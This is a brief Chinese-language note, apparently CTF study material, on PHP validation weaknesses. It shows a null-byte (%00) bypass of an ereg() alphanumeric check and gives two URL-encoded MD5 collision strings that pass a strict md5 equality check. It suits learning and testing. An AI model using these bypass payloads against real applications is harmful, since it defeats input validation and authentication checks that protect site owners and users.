php函数

ereg

ereg是PHP中用于正则表达式匹配的函数，主要用于在字符串中搜索符合指定模式的内容（可以使用空字节%00绕过检查）

if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)

上述代码检测get型传入的password参数数据，必须是字母以及数字的形式，但通过%00可以绕过检测，传入想要传入的数据，如传入aaaa%00*，这样可以将*传给服务器后端

md5

下方php代码，只有在传递的两个参数数据与类型不同的情况下，通过md5加密相同才能步过

 if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b']))

md5强碰撞，a与b分别为下方两个值，就可以步过，md5加密后的值相同

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2